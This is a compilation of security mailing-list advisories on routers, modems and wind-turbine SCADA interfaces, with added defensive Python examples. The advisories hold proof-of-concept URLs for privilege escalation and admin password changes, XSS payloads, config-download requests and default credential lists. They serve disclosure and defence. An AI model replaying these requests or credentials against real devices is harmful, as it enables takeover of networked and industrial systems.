https://IP/system_manage.php?username=viewer1&password=&password=&userlevel=9&action=delete_user&ekey=4&LActiveRow=sys_Luser_4

*Modify existing user (including admin)*
log in as viewer - try change system (admin) user

https://IP/system_manage.php?username=system&password=&password=&userlevel=9&action=delete_user&ekey=4&LActiveRow=sys_Luser_4

0*Success*
1

*Change Admin password*
log in as viewer - try change admin pass

https://IP/system_manage.php?username=admin&password=admin1&password=admin1&userlevel=9&action=update_user&ekey=3&LActiveRow=sys_Luser_3

0*Success*
1

*Downloading configuration xml files*

A viewer priv user has no access/option to the config xmls via the GUI. It is
possible to download the configs by calling the url directly.

*Access policy config xml*
https://IP/configure_manage.php?action=download_config&file=policy.xml

*Access cookie config xml*
https://IP/configure_manage.php?action=download_config&file=cookie_config.xml

*Access system config xml*
https://IP/configure_manage.php?action=download_config&file=systemCfg.xml

+
-- 
Best Regards,
Karn Ganeshen

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
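Issue C above is the server trusting the userlevel in the request rather than the level tied to the caller's session. Below is an added example, not SeaWell's code and not from the post, of a system_manage dispatcher that decides from the session alone and treats the request's userlevel purely as data about the target account; it keeps the one self-service case (changing your own password) that a viewer legitimately needs. The in-memory user store and the policy table are constructed for the example; the level values 9 and 1 are the ones shown in the post.

```python
ADMIN_LEVEL = 9        # userlevel values as shown in the post
VIEWER_LEVEL = 1

# Minimum privilege level each system_manage.php action requires (constructed policy table)
REQUIRED_LEVEL = {
    "list_users":  VIEWER_LEVEL,
    "add_user":    ADMIN_LEVEL,
    "delete_user": ADMIN_LEVEL,
    "update_user": ADMIN_LEVEL,
}


class Forbidden(Exception):
    pass


def handle_system_manage(session, params, users):
    """session: the server-side record created at login ({'username', 'userlevel'}).
    params: the decoded query string. users: in-memory stand-in for the user store
    (username -> {'password', 'userlevel'}). The caller's level comes only from the
    session; params['userlevel'] describes the target account and never the caller,
    which is the confusion the post's PoC exploits."""
    action = params.get("action")
    if action not in REQUIRED_LEVEL:
        raise ValueError(f"unknown action {action!r}")
    actor_level = session["userlevel"]
    target = params.get("username")
    # The sole self-service case: a user may change their own password and nothing else.
    self_service = (action == "update_user" and target == session["username"]
                    and set(params) <= {"action", "username", "password"})
    if actor_level < REQUIRED_LEVEL[action] and not self_service:
        raise Forbidden(f"{session['username']} (level {actor_level}) may not {action}")

    if action == "list_users":
        return sorted(users)
    if action == "add_user":
        if target in users:
            raise ValueError(f"{target} already exists")
        users[target] = {"password": params["password"],          # hash this in real code
                         "userlevel": int(params.get("userlevel", VIEWER_LEVEL))}
    elif action == "delete_user":
        if target not in users or target == session["username"]:
            raise ValueError("no such user, or attempt to delete the current account")
        del users[target]
    elif action == "update_user":
        record = users[target]
        if "password" in params:
            record["password"] = params["password"]
        if "userlevel" in params and not self_service:
            record["userlevel"] = int(params["userlevel"])
    return "Success"


def is_permitted(session, params, users):
    """True if the action ran, False if the authorization check blocked it."""
    try:
        handle_system_manage(session, params, users)
        return True
    except Forbidden:
        return False


def make_users():
    """Constructed starting user table: one admin and one viewer."""
    return {"admin":  {"password": "admin-pw", "userlevel": ADMIN_LEVEL},
            "viewer": {"password": "viewer-pw", "userlevel": VIEWER_LEVEL}}


if __name__ == "__main__":
    store = make_users()
    viewer = {"username": "viewer", "userlevel": VIEWER_LEVEL}
    attempt = {"action": "add_user", "username": "viewer1", "password": "viewer", "userlevel": "9"}
    print("viewer may add an admin:", is_permitted(viewer, attempt, store))
```

The same table also drives issue B's download_config action if it is added with ADMIN_LEVEL: whether the viewer can reach the URL no longer matters, because the decision is made from the session on every request rather than from what the GUI chooses to show.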

[FD] eWON sa Industrial router - Multiple Vulnerabilities

2015-12-24 Thread Karn Ganeshen
ig updated.

*Issue 3*

*Deleting All Users*
It is possible for a user with no rights to:

1. Enumerate configured users
2. Delete any & all users.

HTTP GET request to delete a user (when logged in as 'test') (unauthorized
request)

http:///rcgi.bin/EditForm?CB2=3&NbCB=4&Opera2onType=DeleteUser

This brings up a confirmation prompt validating if we really want to delete
the user.

It presents the username and offers two options -
Option 1 - Cancel and Confirm/Delete
Option 2 - Select Confirm/Delete
.
Users List test
Please confirm you want to delete these items Select Confirm/Delete
.

Next, the url redirects to DeleteForm which then shows Access denied twice
. http:///rcgi.bin/DeleteForm
Access denied
Access denied
.
-> But the user gets deleted anyway. :) Verify by Refreshing User List


*Enumerating Users*
In order to enumerate valid users, we only need to submit the first
DeleteUser request

http:///rcgi.bin/EditForm?CB2=4&NbCB=3&Opera2onType=DeleteUser

It will show the username.

This process can of course be automated to view all valid application
usernames.
…..…..…..…..…..…..…..…..…..…..…..…..…..…..…..…..…..…..

*eWON considered the WEAK RBAC issue a minor one. Apparently, they didn't
understand the impact at all.*
eWON said:
It's a minor issue as this information is already available through the eWON
User Manual. We will however completely block the page in a future eWON
firmware release when user credentials don't meet the requirements, to avoid
any ambiguity regarding eWON security.

—> Regardless, the new firmware says this issue has been fixed..

…..…..…..…..…..…..…..…..…..…..…..…..…..…..…..…..…..…..

*STORED CROSS-SITE SCRIPTING - NOT FIXED by eWON*
CVE-2015-7927


*Vulnerable functions / parameters*
Create / Edit User
User First Name
User Last Name
User information
Create / Edit Tag
Tag Description
…..…..…..…..…..…..…..…..…..…..…..…..…..…..…..…..…..…..
eWON says

Verified.
Won't fix: We left the possibility to include HTML tags or javascript in
form fields and form url parameters to meet some specific final user needs.
Note that this kind of injection is achievable through FTP upload as
everything is saved in the eWON config files. Furthermore all these XSS
exploits also require valid user authentication and rights.

—> Yeah, it’s a feature and input validation is a useless practice anyway..
…..…..…..…..…..…..…..…..…..…..…..…..…..…..…..…..…..…..


*Reflected XSS - NOT FIXED by eWON*
Vulnerable parameter - AST_ErrorMsg

http:///rcgi.bin/wsdForm?sys_Csave=1&AST_ErrorMsg=Successalert("xss-AST_ErrorMsg")&sys_IpMbsSrvPort=502&sys_IpEipSrvPort=44818&sys_IpIsoSrvPort=102&
sys_IpFinsSrvPort=9600&sys_TagPollMode=0&sys_IOTcpDefTO=1000&btUpdate=
Update

*PASSWORDS NOT SECURED - PARTIAL FIX by eWON*
CVE-2015-7928

Passwords are passed in plain text allowing a malicious party to retrieve
them from network traffic. The autocomplete setting of some eWON forms also
allows these passwords to be retrieved from the browser. Compromise of the
credentials would allow unauthenticated access.
…..…..…..…..…..…..…..…..…..…..…..…..…..…..…..…..…..…..
eWON says

2. Won't fix as the final user is supposed to configure eWON through VPN.
—> Yeah, *supposed to*..
…..…..…..…..…..…..…..…..…..…..…..…..…..…..…..…..…..…..

*POST/GET ISSUES - NOT FIXED by eWON*
CVE-2015-7929

eWON firmware web server allows the use of the HTML command GET in place of
POST. GET is less secure because data that are sent are part of the URL.
…..…..…..…..…..…..…..…..…..…..…..…..…..…..…..…..…..…..
eWON says
Won't fix. This could be a problem regarding CRSF (issue B) but the final
user is supposed to configure eWON through VPN (and thus https).

Mitigating factors:

This could be an issue regarding the CSRF attacks described above. However
as already mentioned the eWON firmware exposure to CSRF attacks is really
limited. Thus having equivalent POST and GET parameters handling for each
request sent to the eWON webserver is by extension not problematic.

—> Yeah, *supposed to*.. Not problematic...
…..…..…..…..…..…..…..…..…..…..…..…..…..…..…..…..…..…..
-- 
Best Regards,
Karn Ganeshen

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
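Issue 3 above (DeleteForm prints 'Access denied' twice and deletes the user anyway) is a mutation performed before, or regardless of, the authorization result, and reachable with a GET. As an added example, not eWON firmware code and not from the post, the following orders the checks so that nothing is touched until authorization, HTTP method, target lookup and confirmation have all passed, gives unauthorized callers the same response whether or not the target exists (which also closes the username enumeration route described above), and HTML-escapes the name shown on the confirmation page. The user table is constructed.

```python
import html


def make_users():
    """Constructed user table keyed by numeric id; rights are a set of flags."""
    return {1: {"name": "adm", "rights": {"admin"}},
            2: {"name": "test", "rights": set()}}


def delete_user_endpoint(method, actor_id, target_id, confirmed, users):
    """Return (status, body). Checks run in a fixed order: authorization, HTTP method,
    target lookup, confirmation; only then is the table modified. The post shows the
    device doing the deletion after it had already answered 'Access denied'; here the
    mutation is the last statement and is unreachable unless every check passed."""
    actor = users.get(actor_id)
    if actor is None or "admin" not in actor["rights"]:
        # Same status and body whether the target exists or not, so a caller without
        # rights learns nothing about which ids are valid.
        return 403, "Access denied"
    if method != "POST":
        # A GET (link, image tag, prefetch) must never change state.
        return 405, "Method not allowed"
    target = users.get(target_id)
    if target is None:
        return 404, "No such user"
    if not confirmed:
        # The username is attacker-influenced data (issue 'Stored XSS' above): encode it.
        return 200, (f"<p>Please confirm you want to delete "
                     f"<b>{html.escape(target['name'])}</b></p>")
    del users[target_id]
    return 200, "Deleted"


if __name__ == "__main__":
    table = make_users()
    print(delete_user_endpoint("GET", 2, 1, True, table))    # no rights: denied, nothing changes
    print(delete_user_endpoint("GET", 1, 2, True, table))    # admin over GET: refused
    print(delete_user_endpoint("POST", 1, 2, False, table))  # admin, confirmation page
    print(delete_user_endpoint("POST", 1, 2, True, table))   # admin, confirmed: deleted
    print(sorted(table))
```

The confirmation step is itself safe to render only because the name is escaped; with the "Won't fix" stance on HTML in form fields quoted above, every page that echoes a stored field needs the same treatment.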

[FD] Nordex Control 2 (NC2) SCADA V16 and prior versions - XSS

2015-12-24 Thread Karn Ganeshen
*Nordex NC2 XSS Vulnerability*

*AFFECTED PRODUCTS*
Nordex Control 2 (NC2) SCADA V16 and prior versions.

Nordex is a company based in Germany that maintains offices in countries
around the world.

The affected product, Nordex Control 2, is a web-based SCADA system for
wind power plants. According to Nordex, NC2 is deployed across the Energy
sector. Nordex estimates that this product is used primarily in the United
States, Europe, and China.


*CVE-ID*
CVE-2015-6477

*Reference*
https://ics-cert.us-cert.gov/advisories/ICSA-15-286-01

*Vulnerable parameter*
username

*PoC*

POST /login HTTP/1.1

connection=basic&userName=admin%27%22%29%3B%7D%3C%2Fscript%3E%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&pw=nordex&language=en

-- 
Best Regards,
Karn Ganeshen

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


[FD] XZERES 442SR Wind Turbine XSS

2015-12-24 Thread Karn Ganeshen
XZERES 442SR Wind Turbine Cross-site Scripting Vulnerability

*AFFECTED PRODUCTS*
XZERES is a US-based energy company that maintains offices in several
countries around the world, including the UK, Italy, Japan, Vietnam,
Philippines, and Myanmar.

The affected product, 442SR Wind Turbine, has a web-based interface system.
According to XZERES, the 442SR is deployed across the Energy sector. XZERES
estimates that this product is used worldwide.

*Reference*
https://ics-cert.us-cert.gov/advisories/ICSA-15-342-01

*Vulnerable parameter*
id

*PoC*

http:///details?object=Inverter&id=2alert(xss-id-parameter")

-- 
Best Regards,
Karn Ganeshen

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
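The two XSS advisories above (Nordex userName, XZERES id) differ in where the value lands: the Nordex payload closes a JavaScript string and then the script block it sits in, while the XZERES value lands in HTML. The following added example, not code from either vendor or from the posts, shows the encoding for each output context and validates the id as an integer before rendering anything; the page fragments it renders are constructed for the example.

```python
import html
import json
from urllib.parse import unquote_plus

# Constructed from the URL-encoded userName value in the Nordex PoC above.
NORDEX_USERNAME = unquote_plus(
    "admin%27%22%29%3B%7D%3C%2Fscript%3E%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E")


def html_text(value):
    """Encoding for HTML element content and quoted attribute values."""
    return html.escape(str(value), quote=True)


def js_string_literal(value):
    """Encoding for a value placed inside a <script> block as a JS string literal.
    json.dumps takes care of quotes and control characters; the extra replacements stop
    '</script>' inside the string from terminating the block, which is exactly what the
    Nordex payload relies on (the HTML parser ends the script before JS ever runs)."""
    out = json.dumps(str(value))
    return out.replace("<", "\\u003c").replace(">", "\\u003e").replace("&", "\\u0026")


def is_valid_object_id(value):
    """The XZERES id parameter is numeric: reject anything that is not an integer."""
    try:
        int(value)
        return True
    except (TypeError, ValueError):
        return False


def render_login_error(username):
    """HTML context: the failed login name echoed back in the page body."""
    return f"<p>Login failed for user {html_text(username)}.</p>"


def render_details_page(object_name, object_id):
    """HTML context for the heading, JS string context for the script block, and the id
    rendered only after it has been proven to be an integer."""
    if not is_valid_object_id(object_id):
        raise ValueError("id must be an integer")
    object_id = int(object_id)
    return (f"<h1>{html_text(object_name)} #{object_id}</h1>\n"
            f"<script>var current = {{name: {js_string_literal(object_name)}, "
            f"id: {object_id}}};</script>")


if __name__ == "__main__":
    print(render_login_error(NORDEX_USERNAME))
    print(render_details_page(NORDEX_USERNAME, "2"))
```

Validation (the integer check) and encoding are complementary: the id never needs encoding because only digits survive, while the free-text username cannot be validated away and so must be encoded for the exact context it is written into.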


[FD] LG Nortel ADSL modems - Multiple vulnerabilities

2015-12-09 Thread Karn Ganeshen
# Title: [LG Nortel ADSL modems - Multiple vulnerabilities]
# Discovered by: Karn Ganeshen
# Vendor Homepage: [NA]
# Version Reported: [Board ID: DV2020]+Product Version: S1.064B2.3H0-0 +
Software Version: 3.04L.02V.sip._LE9500.dspApp3341A2pB022f.d19e]

*Timelines*
April, 2015: Vulnerabilities found
April 2015: Reported to Optus & CERT
April - October 2015: CERT (US/AUS) attempts to identify vendor / device
ownership. None found.
Dec 03, 2015: Public disclosure

*CVE-IDs*
None (Mitre..?)

*Note*:
After several months, vendor ownership for this device still remains
unknown/unconfirmed.

Regardless, it is currently in use, deployed by Optus (Australia), with
possibly 20-30% of customer base (primarily broadband services - home users
/ SOHO). So, quite a number up there.

There may be others but I & CERT are not aware of such.

*Device Info*
Board ID: DV2020
Product Version: S1.064B2.3H0-0
Software Version: 3.04L.02V.sip._LE9500.dspApp3341A2pB022f.d19e
Bootloader (CFE) Version: 1.0.37-4.3
Wireless Driver Version: 3.131.35.0.cpe0.0


*Vulnerabilities*

Authorization flaws, Sensitive Information Disclosure, Insecure
configuration, Denial of Service


*1. Authorization Flaws (HTTP)*

1.1 *Non-admin users can access restricted, Administrative functionality
(accessible to Admin only)*

LG-Nortel ADSL modem allows three (3) users with different privilege levels
for administering the device. Administrative ‘admin’ user has complete
privileges to access and perform all functions on the modem. Other
non-admin users – ‘support’ and ‘user’ – have restricted functional access
and can perform limited functions.

A non-admin ‘user’ does not have access to administrative functions via GUI
menu, i.e. there are no administrative function links *seen/visible* in the
home page.

However, the application lacks sufficient Authorization controls and a
‘user’ can still access the administrative functionality via direct url
access.

For example, a non-admin ‘user’ does not have a menu option to access the
device configuration file. However, it can still access the file -
*backupsettings.conf* - by directly accessing the url – http://
/backupsettings.conf.

With access to this configuration file, a low-privileged ‘user’ can easily
access login passwords for ‘admin’ and any other valid users of the modem.
The login passwords are stored in base64-encoded format, which is a weak
scheme to secure passwords, and clear-text password(s) can be easily
obtained.

In a similar manner, low-privileged ‘user’ and ‘support’ logins can also
access other administrative functions.

1.2 *Application does not secure sensitive configuration details from
non-admin ‘user’ (HTTP)*

The application allows read-only access to the ‘user’ login. However, sensitive
configuration information such as passwords, keys, etc. is not restricted
from the user. All configuration details are readily accessible and
readable to the ‘user’ login.

1.3 *Password Change - Clear-text Password Disclosure*

The application does not secure the newly changed password. Once password
is changed,  the application reveals the new password in address bar, as:

http:///password.cgi?sptPassword=


This HTTP request contains new, valid password in clear-text.


*2. Application does not secure configured passwords (HTTP)*

The application relies on client-side checks only - which can be easily
bypassed - to hide juicy info like service accounts and respective
passwords, etc. These passwords are masked and only * are shown in the
corresponding fields.

The following HTTP GET request shows capture of *masked *SIP / voip
password(s):

GET /voicesipset.cmd?proxyAddr=sip11.yesphone.optus.com.au&proxyPort=5060&regAddr=sip11.yesphone.optus.com.au&regPort=5060&extension1=&extension2=&password1=<password-removed>&password2=&ifName=ppp_8_32_1&servermode=proxy&telurl=sip&regexpiry=1800&hostname=sip11.xxx.xxx.com.au&localport=5060&display1=&display2=&authuser1=&authuser2= HTTP/1.1


*3. Insecure configuration (Telnet)*

3.1 *No separation of privileges*

After logging in over Telnet as ‘user’, the system still permits running
system level commands and to read sensitive files from the file-system.

- *shadow* is not used, all hashes are stored in *passwd* readable by
everyone, and all system users are uid 0, gid 0, root privileged
superusers. :)


3.2 *Application does not secure sensitive configuration details from
‘user’*

The application permits ‘user’ login to view sensitive information in
modem’s configuration. To view configuration, Telnet administrative console
provides a command - *dumpcfg* - to ‘user’. Running this command as ‘user’
login dumps the device configuration information. This information includes
sensitive information such as passwords and keys - all in clear-text.


*4. Authorization flaws + Denial of Service (Telnet)*

After logging in to the modem, *passwd* command can be used to change
passwords 

[FD] Brocade Fabric OS v6.3.1b Multiple Vulnerabilities

2015-11-30 Thread Karn Ganeshen
# Title: [Brocade Fabric OS v6.3.1b - Multiple vulnerabilities]
# Discovered by: Karn Ganeshen
# Vendor Homepage: [www.brocade.com]
# Versions Reported: Kernel 2.6.14.2 + FabOS v6.3.1b + BootProm 1.0.9

> *version*
Kernel: 2.6.14.2
Fabric OS:  v6.3.1b
BootProm:   1.0.9

1 *Default diagnostic accounts*
root and factory with default passwords documented in respective admin
guides. By default, both these users are not restricted and can SSH /
telnet in to the box.

2 *unix-passwd-in-etc-passwd*
Password hashes found in /etc/passwd files (All user hashes)

3 *unix-uid-0-accounts*
Multiple users have UID 0 privs

4 *unix-world-writable-files*
Multiple world writable files are present:
/etc/fabos/hil_wwn
/etc/fabos/cfgsave/factory/etc/hosts
/etc/raslog.ext
/etc/raslog.int
/etc/ipadmd_log.txt
/etc/hosts.0

5 *unix-user-home-dir-mode - weak access permissions*
The permissions for home directory of user basicswitchadmin was found to be
755 instead of 750.

6 *generic-passwd-shadow-group-file-permissions - weak access permissions*
The permission of file '/etc/shadow' is not 400.

7 *unix-partition-mounting-weakness*

/tmp partition does not have 'nosuid' option set.
/tmp partition does not have 'noexec' option set.
/tmp partition does not have 'nodev' option set.
/mnt partition does not have 'nodev' option set.

8 *unix-suid-writable*
Following world-writable suid files were found on the system:
/etc/fabos/hil_wwn(-r-xrw-rw-)

9 *unix-suid-script*
Multiple scripts with suid set were found on the system:

wwn
/fabos/sbin/coreshow
/fabos/sbin/timeLineGet
/fabos/bin/getIpAddr.sh
/fabos/bin/userConfig
/fabos/cliexec/authCmds
/fabos/cliexec/config
/fabos/cliexec/configCmd
/fabos/cliexec/configure
/fabos/cliexec/fcping
/fabos/cliexec/fpcmd
/fabos/cliexec/haadm
/fabos/cliexec/helpcmds
/fabos/cliexec/ipAddr
/fabos/cliexec/killtelnet
/fabos/cliexec/ms
/fabos/cliexec/savecore
/fabos/cliexec/secCmds
/fabos/cliexec/ssave.sh
/fabos/cliexec/supportsave
/fabos/cliexec/supportsavestatus
/fabos/cliexec/switchcmd
/fabos/cliexec/syscmd
/fabos/cliexec/trace_cli
/fabos/standby_sbin/coreshow
/fabos/libexec/coreffdc.sh
/fabos/libexec/ethmode
/fabos/libexec/getDefaultFID
/fabos/libexec/ipc_showAll
/fabos/libexec/secRoleCheck
/fabos/etc/swInst
/fabos/webtools/htdocs/weblinker.fcg
/var/log/rcslog.old
/var/log/fdmilog.txt
/var/log/ficulog.txt
/var/log/nslog.txt
/var/log/rcslog.txt
/var/log/seclog.txt
/var/log/zonelog.txt
g.txt
/var/log/esslog.old
/var/log/ficulog.old
/var/log/fdmilog.old
/var/log/esslog.txt
/var/log/nslog.old
/var/log/seclog.old
/var/log/zonelog.old
/var/log/snmplog.old
/bin/passwd
/bin/login
/bin/login.nopam
/bin/ping
/sbin/fuser
/sbin/bootenv
/usr/bin/du
/usr/bin/ppname
/usr/bin/rcp
/usr/bin/rlogin
/usr/bin/rsh
/usr/sbin/sendmail
-- 
Best Regards,
Karn Ganeshen

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
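
The Fabric OS findings above are the kind of host-hardening checks that can be re-run on any Linux-based appliance image. The following is an added example, not part of the advisory: it reproduces findings 2, 3, 7 and 8 (hashes in /etc/passwd, extra UID 0 accounts, missing /tmp and /mnt mount options, world-writable setuid files) as functions that take file contents or a directory, so they run here against constructed samples and can equally be pointed at a real host's /etc/passwd, /proc/mounts and root filesystem. The sample hashes, paths and mount table are constructed to mirror the advisory.

```python
"""Offline audit for the host-level findings reported against Fabric OS.

Added example, not from the advisory. The sample data below is constructed to
mirror the findings; the functions themselves are generic.
"""
import os
import stat
import tempfile

# Constructed /etc/passwd: two UID 0 accounts carrying hashes in field 2.
SAMPLE_PASSWD = """\
root:$1$placeholder$aaaaaaaaaaaaaaaaaaaaaa:0:0:root:/root:/bin/sh
factory:$1$placeholder$bbbbbbbbbbbbbbbbbbbbbb:0:0:factory:/home/factory:/bin/sh
admin:x:1000:1000:admin:/home/admin:/bin/sh
basicswitchadmin:*:1001:1001::/home/basicswitchadmin:/bin/sh
"""

# Constructed /proc/mounts: /tmp lacks nosuid/noexec/nodev, /mnt lacks nodev.
SAMPLE_MOUNTS = """\
rootfs / rootfs rw 0 0
tmpfs /tmp tmpfs rw,relatime 0 0
/dev/hda3 /mnt ext2 rw,nosuid,noexec 0 0
"""

# Password-field values that mean "no hash here"; anything else is a hash.
LOCKED = {"x", "*", "!", "!!", ""}


def passwd_hashes_in_passwd(passwd_text):
    """Finding 2: users whose /etc/passwd password field holds a real hash."""
    users = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 2 and fields[1] not in LOCKED:
            users.append(fields[0])
    return users


def extra_uid0_accounts(passwd_text):
    """Finding 3: accounts other than root that carry UID 0."""
    users = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 3 and fields[2] == "0" and fields[0] != "root":
            users.append(fields[0])
    return users


def missing_mount_options(mounts_text, mountpoint, required):
    """Finding 7: required mount options absent from the given mount point."""
    for line in mounts_text.splitlines():
        fields = line.split()
        if len(fields) >= 4 and fields[1] == mountpoint:
            present = set(fields[3].split(","))
            return [opt for opt in required if opt not in present]
    return list(required)  # not mounted at all: every option is missing


def is_setuid(path):
    return bool(os.lstat(path).st_mode & stat.S_ISUID)


def world_writable_suid(root):
    """Finding 8: regular files that are both setuid and world-writable,
    i.e. anyone can replace code that later runs with the owner's privileges."""
    hits = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            mode = os.lstat(path).st_mode
            if stat.S_ISREG(mode) and mode & stat.S_ISUID and mode & stat.S_IWOTH:
                hits.append(os.path.relpath(path, root))
    return sorted(hits)


def build_sample_tree():
    """Throwaway tree: one world-writable setuid file plus two near misses."""
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, "etc", "fabos"))
    for rel, mode in (("etc/fabos/hil_wwn", 0o4566),   # -r-xrw-rw- plus setuid
                      ("etc/only_suid", 0o4755),        # setuid but not writable
                      ("etc/only_ww", 0o666)):          # writable but not setuid
        path = os.path.join(root, rel)
        open(path, "w").close()
        os.chmod(path, mode)
    return root


if __name__ == "__main__":
    print("hashes in passwd:", passwd_hashes_in_passwd(SAMPLE_PASSWD))
    print("extra uid 0:     ", extra_uid0_accounts(SAMPLE_PASSWD))
    print("/tmp missing:    ", missing_mount_options(SAMPLE_MOUNTS, "/tmp",
                                                     ["nosuid", "noexec", "nodev"]))
    print("/mnt missing:    ", missing_mount_options(SAMPLE_MOUNTS, "/mnt", ["nodev"]))
    print("ww setuid:       ", world_writable_suid(build_sample_tree()))
```

To audit a live host, pass `open("/etc/passwd").read()`, `open("/proc/mounts").read()` and `"/"` to the same functions; the setuid walk is the slow part and is best restricted to the filesystems that actually carry binaries.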


[FD] Cambium ePMP 1000 - Multiple Vulnerabilities

2015-11-19 Thread Karn Ganeshen
validate,
post-check=0, pre-check=0
Cache-Control: no-cache
Status: 200 OK
Content-Type: application/json
Content-Disposition: attachment; filename=.json
Expires: 0
Date: Sun, 18 Jan 1970 16:50:21 GMT
Server: Cambium HTTP Server

{
"template_props":
{
"templateName":"",
"templateDescription":"",
"device_type":"",

…

…
}

.


Best Regards,

Karn Ganeshen

-- 
Best Regards,
Karn Ganeshen

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] ZTE ADSL modems - Multiple vulnerabilities

2015-11-14 Thread Karn Ganeshen
*ZTE ADSL modems - Multiple vulnerabilities*

Confirmed on 2 (of multiple) software versions - *W300V2.1.0f_ER7_PE_O57
and W300V2.1.0h_ER7_PE_O57*

1 *Insufficient authorization controls*

*CVE-ID*: CVE-2015-7257

Observed in Password Change functionality. Other functions may be
vulnerable as well.

*Expected behavior:*

Only administrative 'admin' user should be able to change password for all
the device users. 'support' is a diagnostic user with restricted
privileges. It can change only its own password.

*Vulnerability:*

Any non-admin user can change 'admin' password.


*Steps to reproduce:*

a. Login as user 'support' password XXX

b. Access Password Change page - http:///password.htm

c. Submit request

d. Intercept and tamper the parameter - username - change from 'support' to
'admin'

e. Enter the new password -> old password is not requested -> Submit

-> Login as admin

-> Pwn!



2 *Sensitive information disclosure - clear-text passwords*

Displaying user information over Telnet connection, shows all valid users
and their passwords in clear-text.

*CVE-ID*: CVE-2015-7258

*Steps to reproduce:*

$ telnet 

Trying ...

Connected to .

Escape character is '^]'.

User Access Verification

Username: admin

Password: <--- admin/XXX1

$sh

ADSL#login show <--- shows user information

Username  Password   Priority

admin     password1  2

support   password2  0

admin     password3  1



3 *(Potential) Backdoor account feature - insecure account management*

Same login account can exist on the device, multiple times, each with
different priority#. It is possible to log in to device with either of the
username/password combination.

*CVE-ID*: CVE-2015-7259

It is considered as a (redundant) login support *feature*.


*Steps to reproduce:*

$ telnet 

Trying ...

Connected to .

Escape character is '^]'.

User Access Verification

User Access Verification

Username: admin

Password: <--- admin/password3

$sh

ADSL#login show

Username  Password  Priority

admin  password1  2

support  password2  0

admin  password3  1

+

Best Regards,

Karn Ganeshen
-- 
Best Regards,
Karn Ganeshen

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
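
The three ZTE findings share one root cause: the device trusts request data for identity and stores accounts without any integrity rule. The following is an added example, not the modem's firmware and not part of the advisory: a small model of the account table showing the defect (the target account is taken from the 'username' form field and no old password is asked, as in steps d and e) beside the fix (the acting identity comes from the session, non-admin users may change only their own password, and the current password is required). It also parses a 'login show' listing to flag usernames that appear more than once (finding 3). Usernames, priorities and passwords are constructed to match the listing in the advisory; the handler signatures are assumptions.

```python
"""Server-side authorization for the password-change flow.

Added example, not from the advisory; account data is constructed.
"""

ADMIN_PRIORITY = 2

# Constructed copy of the 'login show' output quoted in the advisory.
LOGIN_SHOW = """\
Username  Password   Priority
admin     password1  2
support   password2  0
admin     password3  1
"""


class Modem:
    def __init__(self):
        # Clear-text passwords only so the toy mirrors the listing; a real
        # device should store salted hashes (finding 2 is exactly this weakness).
        self.users = {
            "admin": {"password": "password1", "priority": ADMIN_PRIORITY},
            "support": {"password": "password2", "priority": 0},
        }

    def login(self, username, password):
        """Return a session bound to the authenticated user, or None."""
        user = self.users.get(username)
        if user is None or user["password"] != password:
            return None
        return {"user": username}

    def change_password_vulnerable(self, session, form):
        """Defective handler: trusts the form's 'username' field."""
        if session is None:
            return "not logged in"
        target = form["username"]  # attacker-controlled; no role or old-password check
        self.users[target]["password"] = form["newpass"]
        return "ok"

    def change_password_fixed(self, session, form):
        """Hardened handler: identity from the session, role and old-password checks."""
        if session is None:
            return "not logged in"
        actor = session["user"]
        target = form.get("username", actor)
        if target not in self.users:
            return "no such user"
        is_admin = self.users[actor]["priority"] == ADMIN_PRIORITY
        if target != actor and not is_admin:
            return "forbidden"
        # Changing one's own password always requires proving the current one,
        # so a hijacked session cannot silently lock the real user out.
        if target == actor and form.get("oldpass") != self.users[actor]["password"]:
            return "old password required"
        if not form.get("newpass"):
            return "empty password"
        self.users[target]["password"] = form["newpass"]
        return "ok"


def duplicate_accounts(login_show_text):
    """Map each username listed more than once to its priorities, in order."""
    priorities = {}
    for line in login_show_text.splitlines()[1:]:  # skip the header row
        parts = line.split()
        if len(parts) == 3:
            priorities.setdefault(parts[0], []).append(int(parts[2]))
    return {u: p for u, p in priorities.items() if len(p) > 1}


if __name__ == "__main__":
    tampered = {"username": "admin", "newpass": "changed"}  # step d of the advisory
    m = Modem()
    s = m.login("support", "password2")
    print("vulnerable:", m.change_password_vulnerable(s, tampered), m.users["admin"])
    m = Modem()
    s = m.login("support", "password2")
    print("fixed:     ", m.change_password_fixed(s, tampered), m.users["admin"])
    print("own change:", m.change_password_fixed(s, {"oldpass": "password2",
                                                      "newpass": "changed"}))
    print("duplicates:", duplicate_accounts(LOGIN_SHOW))
```

The fixed handler never reads the acting identity from the request; the 'username' field only names the target, and the session decides whether that target is permitted. On the detection side, `duplicate_accounts` is the check to run over a device's account listing during an audit, since a second entry for an existing name is exactly the redundant-login situation finding 3 describes.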

[FD] PROLiNK H5004NK ADSL Wireless Modem Multiple Vulnerabilities

2015-10-15 Thread Karn Ganeshen
# Exploit Title: [PROLiNK H5004NK ADSL Wireless Modem Multiple
Vulnerabilities]
# Discovered by: Karn Ganeshen
# Reported on: [October 13, 2015]
# Vendor Response: [No process to handle vuln reports]
# Vendor Homepage: [
http://www.prolink2u.com/newtemp/datacom/adsl-modem-router/381-h5004nk.html]
# Version Affected: [Firmware version R76S Slt 4WNE1 6.1R]


**Vulnerability Details**

*1. Default, weak passwords for http and ftp services*

a. *HTTP accounts*
- admin/password
- user/user
- guest/airocon

* -> last four digits of MAC address *

b. *FTP accounts*

- admin/admin
- useradmin/useradmin
